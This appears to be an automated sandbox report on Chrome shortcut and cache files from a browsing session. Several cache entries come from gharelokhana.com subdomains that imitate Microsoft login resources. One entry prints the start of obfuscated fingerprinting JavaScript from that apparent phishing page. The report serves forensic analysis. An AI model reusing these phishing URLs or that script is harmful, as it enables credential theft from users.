                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............+Vs.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 06:23:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2681
                                                Entropy (8bit):3.9942641598861512
                                                Encrypted:false
                                                SSDEEP:48:8odLjTHPjfHcidAKZdA1vehDiZUkwqehAy+R:80rn2y
                                                MD5:C67EE3664F4E9642B35D522FAC5EBD63
                                                SHA1:AACBC068168448FBC7D169DA0F0C0732A2ED545C
                                                SHA-256:3C64F238000C97506A1B1FE9B4B94FFB02D2BA359A53C1535FDF9994A08C1093
                                                SHA-512:831EDD5B99A0BF2460F4DF65D7427609B80546A38EC58C1E617D19B68D88257E96381EBE8B0134E2A4E9859699D8B1A59944B70B23C1479C36F82EEA31240327
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,........F..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............+Vs.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 06:23:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2681
                                                Entropy (8bit):3.9847435936967863
                                                Encrypted:false
                                                SSDEEP:48:8RdLjTHPjfHcidAKZdA1hehBiZUk1W1qehyy+C:8DrX9Sy
                                                MD5:5AED6E6CFA06A8AC78D15C207ADEAAF9
                                                SHA1:1E0C1316FB3083F0030EFF26DA30B22E13CA2983
                                                SHA-256:E89739250DEDDABF3AA3B6321DF3A18ECA2DF4BAE1BAA9888D6841B79DED0136
                                                SHA-512:C6ADCF0866C4AF0F02B74AA6B8971F8904D1F32B240F97C797AEC2A324AD0B8B650059835FB4C48838F5410840400C468DE2575D7401FCDD8605AC2E62383722
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,........F..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............+Vs.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 06:23:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2683
                                                Entropy (8bit):3.992087900687133
                                                Encrypted:false
                                                SSDEEP:48:8udLjTHPjfHcidAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8OrfT/TbxWOvTboy7T
                                                MD5:B116290BB8673587B02885B49C4FAD22
                                                SHA1:9716B5E8F7AB8854550E2E172DD84F517F8DF9BA
                                                SHA-256:C7B056FA47D83BD9428E8EACF8094966DDC3393CA56C6A7988EE618348528629
                                                SHA-512:D84C34DCC189F5BE234DC2AFA83E80667469D8489672AB8458AC9FBE772228C96ACDC88ADDF1B0B9727B6EBECFFABC90EB72CB6C9889BB51BC436753A3F9D052
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....qx...F..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............+Vs.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                Chrome Cache Entry: 100

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, original size modulo 2^32 3651
                                                Category:dropped
                                                Size (bytes):1435
                                                Entropy (8bit):7.860223690068481
                                                Encrypted:false
                                                SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                                MD5:DF6A7721C242813411CC6950DF40F9B3
                                                SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                                SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                                SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                                Malicious:false
                                                Reputation:low
                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                                Chrome Cache Entry: 101

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 450007
                                                Category:dropped
                                                Size (bytes):122366
                                                Entropy (8bit):7.997923806945064
                                                Encrypted:true
                                                SSDEEP:3072:rEaqX0++A6EIRMBphCs3NXMj689V37l9jjQ:rE5rJpsSNXMjjHs
                                                MD5:FC12BF558E8E5B38F1202817189EF8DC
                                                SHA1:0A1BD9EFA66FEFEC6F9562029FECB378F1C02613
                                                SHA-256:2EAC5A0BEB05086390FD44AA6DE16C3783638EAB62B04E821F8D8D633AED8B82
                                                SHA-512:1D081CE26EC978C9B78083FD2B91069BB4445AF735E4F96F26248198A3B633130AE997CE616A431D71CAED230BF2C945EEBC703DFC56CE5130A40313BB63EB59
                                                Malicious:false
                                                Reputation:low
                                                Preview:...........{W.8.....{_&.L:.....t...C.g...,.V......;.|._UI.....u...G.K.W.T.*.J.~...J?.v..?..u..48)].>.:*]..?K...............4.|V..#;fn).JaT..'.fad',.M.....8....fQ.'s...{q..F...Ke..rK.v...N/+U..Am.......^..CR...sX..\... f.y....9..s..8.'..9.{.F.9...Kv.J1KJ.0J.x?..!B.Zcj....8t..s..1.....z!vq6.Ac.0._.J'....>......E..x...x.....g.A...Ts.Y.]..R..Q...c.K.e....Z.Dv.(.......)........Mg....^bq..f......U%..J..aP..........vkF.g=$.,6?|.x..|T.<.........N?..|..1..y.....1.\.....g.qf.r>.......Ku*NsSq).b.S!..`..b9.8....\+........Ye!...r._aT~.a&tO...v.G...c..;...~.1..,.$....N....N..p.U...0y.......@..eU. ...{..m....v..y.P..h........H..KQ.....,.........no.0.}G...T..o..+..R..Z,u.Z.fm...!D4x.w..U"......@..*.}*ma....@..-C...b.......>&..........U..'...G^.....E.......7...)..h.[..(..b.$.....=..!.8..y.:K.. ...k...C..G.F!.^L....G>.*...J..G.9..X7*..@L.L...h-.p..%R?.>e.......=....@O..*....w/.....2....5..T.......R........hY...~T...Z.....s.c..\|.zmO..)+k..Up.)#

                                                Chrome Cache Entry: 102

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):4.241202481433726
                                                Encrypted:false
                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                Malicious:false
                                                Reputation:low
                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                Chrome Cache Entry: 103

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 142331
                                                Category:downloaded
                                                Size (bytes):49935
                                                Entropy (8bit):7.995485889043815
                                                Encrypted:true
                                                SSDEEP:1536:OTpRuAAOQI4bO016UUwxRrX34E+xuwbdN7nXtvxIFz:O28uXUOxX34JuwbHXtvK
                                                MD5:71329659B6311A17136CD8FAD0249490
                                                SHA1:A605D4C523CDB7B2409206EE114CACF9DF9C7A6F
                                                SHA-256:2FC3E152388DE0088147BCB7BCA2F4899B85A4F71B901147C66C3F5D0C18B3FF
                                                SHA-512:6D219201C751535153DBE82EEC0183CCDA84E17CAA6A4224DBCA9DC993B9A7B1EEFA8AE1149504EB5625E7481252703D8D90D171AB45346B90BCCDC4F366A97F
                                                Malicious:false
                                                Reputation:low
                                                URL:https://707242bf-3c4125ca.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                Preview:...........m[.8.0........OL....;w.....a.L...\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De....q.W.~.@......*T.y.S7J.*..f...P....Pz.......a.E..<.m./A,*...Q.....U..q...$.Db,...H<...'....J,..$..;nG.2DHYkL../......=.pB....A?.&...i,......2lo...$.<.s...?~p[......L..&x.qR.u3...6q:....U.Y1.."... .>Un#7@.........."H,@.......?..P....p6.S.[...E].A..G.....q..j4w6......YwI2....[?....w..i......8...........So....d.K.1....|...........Cq...S5............r.......d...aUa>..JRM.-...nT.....qm....b.a...N..OEp..u.Z...2...#d.:.B.&O3Q.s..c.(.........Z....^F.....l..U...bZ..4:....?T.k.PeU\....L.a..>..t.......jV...B.i7....>b..T....D2...>.f.)...v0.y....kMKf..EG..X.....V`e../Sg...->.Vh}.....R..^..OZF.|i.(..#..1... P8!^3...$] .+..".........lM.'..!...(...T.l.;...$D%N .)..#O.V...'r\.... ...&....J|."Nd%D:uw6.>U.+...H&.Z...T=.&U.v....J.t.0%+...U..3M....y...L......p='.....?%...x:woO.{Q5..0....

                                                Chrome Cache Entry: 104

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                Category:downloaded
                                                Size (bytes):2279
                                                Entropy (8bit):7.354295352983905
                                                Encrypted:false
                                                SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                                MD5:7E0D59593F3377B72C29435C4B43954A
                                                SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                                SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                                SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...

                                                Chrome Cache Entry: 105

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 15768
                                                Category:dropped
                                                Size (bytes):5538
                                                Entropy (8bit):7.960199579905109
                                                Encrypted:false
                                                SSDEEP:96:whCVXNOo3nAv0SIPouFHQ4uQxsZ51rT18Ps8RLTJZctq5/+XVGbN6o91UwSuaGwg:NdOa8APoAQusbT1v8RtutveNR/aGJ
                                                MD5:D63B348D234F84AA9D51C5EDE29E2B6E
                                                SHA1:AF30AFBFC6DC69C80B42637E7B5A149F58F80071
                                                SHA-256:E552737337424A3E33E655698E3D7DF6DFDAD588A44BE35E3723AC5FF694F881
                                                SHA-512:2B3C92D4B4E106AD8E16F96DC46E9C368F41B2311A641E9510CB842E84037EEB87C2F6FEC74B84B6CE29C94F9427289D4F61057AAAB93B525206A8D437336F94
                                                Malicious:false
                                                Reputation:low
                                                Preview:...........[}w.F...?.b.(..c.i....8zI..k..f...$F.1.. ........$!..=.13w..s./>.w........u{g.=...u.....>h./{.F..xhS..7.6....9p...(.D..a..Q.\hS.L|7.FI4.....$....._.X4.At..@.x...s.seZ.....!V..x..'..F.?..z.[..Ppm.z<..'.p.]..$..(..>...6.3..o.47..6..t...AfX..F.($8...= ...'..GDb<.iM..s.D....N..F.<.e.......M....t ...Sk.'wDb.h...M2K...... ..6N.X.o..s...S.....r.`......1..4.c...J....V....ED.7.........p......&i....p....O.. ....k......+p..-N....|..E...q.v5.....M]?.7.*_Eg.*...U.._.(RYZ.._U!]9..q..D..bwx....;.c.............g.....h...X.g!....s..."<.M..qd2..oM.f...I.F.=.-..7.9.9...'.n.@.X..+.4.R.M.y.y..',.lg.z...k.fA...B.@..,..;.'9.Z.....!.b..,_..17L.:.R.4.........yL\,..g.tr...A.p$n....S..q..E.......P.#.....pvE.d.....F...x...,`c.V...,~....">....%yu..h'.i..>.g.Nj.I.._.u.{..!..]...F...1.aP4..6./.$8..m..K...D.m.q....$.......XSb6k..+......9.....=?...5.e.?.`.wjp.QQjC6..<...=..CJ7`.A.d....1O....._..0..)....v.d......anSc.i..z..8NR.7N.N..{...q..,yBV;2

                                                Chrome Cache Entry: 106

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65454)
                                                Category:downloaded
                                                Size (bytes):199111
                                                Entropy (8bit):5.869682954079794
                                                Encrypted:false
                                                SSDEEP:3072:mkaaJ2sWVqKd8qK8tRmmNDaUqNDrqBAueuDp8a:paLNYKK8t0tFDm2ueTa
                                                MD5:BE319384F62B93F65294753B9A665A52
                                                SHA1:45B85A9585F64B4A4AD396B835138A8B9DD3309C
                                                SHA-256:F85DE65A7914B58C389CAD54665DBC0FF222C4932AA2E4F696AFB8466F79C1BF
                                                SHA-512:FFDA23ADEFC8295F000F1D8F712F712050462BB661FB231D84C8E2113054E3BECAC583E2B5B77933CA46EACBA644DB5F51B416EE3DA96EFAA61812D53B9DF205
                                                Malicious:false
                                                Reputation:low
                                                URL:https://djdjkdlellekkff.gharelokhana.com/4.5.1/npm-monitoring
                                                Preview:<!DOCTYPE html>.<html lang="en">. <head>. <script type="text/javascript">. function a0T5(T,B){var k=a0T4();return a0T5=function(H,p){H=H-0x1ba;var f=k[H];return f;},a0T5(T,B);}function a0T4(){var aj=['esUmJ','unhandledRejection','emit','navigator','domain','cookietest=1;\x20SameSite=Strict;\x20expires=Thu,\x2001-Jan-1970\x2000:00:01\x20GMT','Symbol','charAt','\x20is\x20not\x20iterable','MohTE','closePath','cHSVO','process','cssText','enter','type','acosh','default','SGAfv','clientHeight','UCXGd','','frequency','IYEoB','supports','toLocaleString','zaUTW','WebKitMediaKeys','resolve','(max-monochrome:\x20','RegExp','5','sessionStorage','suffixes','done','Cwm\x20fjordbank\x20gly\x20','10244008DQectR','Too\x20high\x20value','.ezmob-footer','Gill\x20Sans','noUfn','VtcIS','gRWaa','CYUPz','rgba(102,\x20204,\x200,\x200.2)','UBKQc','precision','817029qpAUvs','TGeSU','Null','InvalidAccessError','Qolts','msLaunchUri','4uxGCFX','facade','setProperty','','pISpi','kArwB','-apple-system-body','RTCE

                                                Chrome Cache Entry: 107

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:GIF image data, version 89a, 352 x 3
                                                Category:dropped
                                                Size (bytes):3620
                                                Entropy (8bit):6.867828878374734
                                                Encrypted:false
                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                Malicious:false
                                                Reputation:low
                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...

                                                Chrome Cache Entry: 75

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                Category:dropped
                                                Size (bytes):2279
                                                Entropy (8bit):7.354295352983905
                                                Encrypted:false
                                                SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                                MD5:7E0D59593F3377B72C29435C4B43954A
                                                SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                                SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                                SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                                Malicious:false
                                                Reputation:low
                                                Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...

                                                Chrome Cache Entry: 76

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 113424
                                                Category:downloaded
                                                Size (bytes):20410
                                                Entropy (8bit):7.9805705000682945
                                                Encrypted:false
                                                SSDEEP:384:BRvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:Bpmm7ZFM+ObGGUIjN5PJV3Tp
                                                MD5:69F909D3BA8C6B993DD001B8B9F54F55
                                                SHA1:F9EAAAA6BC33CE60A2DA8E9FF0F3408CC21CC9EA
                                                SHA-256:5DEB7C0DFBFFCA6439CADD009CD4F57AF7C3E8B6AD9B1467DB95A1B0DC262B0C
                                                SHA-512:F6BF4430A5156EA007DE793074AF2C2D2B5410AB04BF96FDC310FC3C66B3E9C0A759B5FC44E55B86811D5F6D07C382A5B6E648899617EE107DB31CF8A9F4C269
                                                Malicious:false
                                                Reputation:low
                                                URL:https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.

                                                Chrome Cache Entry: 77

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 113809
                                                Category:downloaded
                                                Size (bytes):35203
                                                Entropy (8bit):7.99327285339654
                                                Encrypted:true
                                                SSDEEP:768:WvEsQ9nnq7Qszq35Hi4Sbt5o2xZHr6BrXFC8FIbdTdqx2LlKQgQL:Nq7I5C5tC2xZLwrXFvFVx97+
                                                MD5:A990D50328B56E13BFF04D39EC2FA337
                                                SHA1:8B64CCF0C9C3136B1AB65278BCB0F0B946E173FB
                                                SHA-256:295E5B70EC0DF8234E9E553A97B45527BE7380FBE75E4986E107DB13ABF8232A
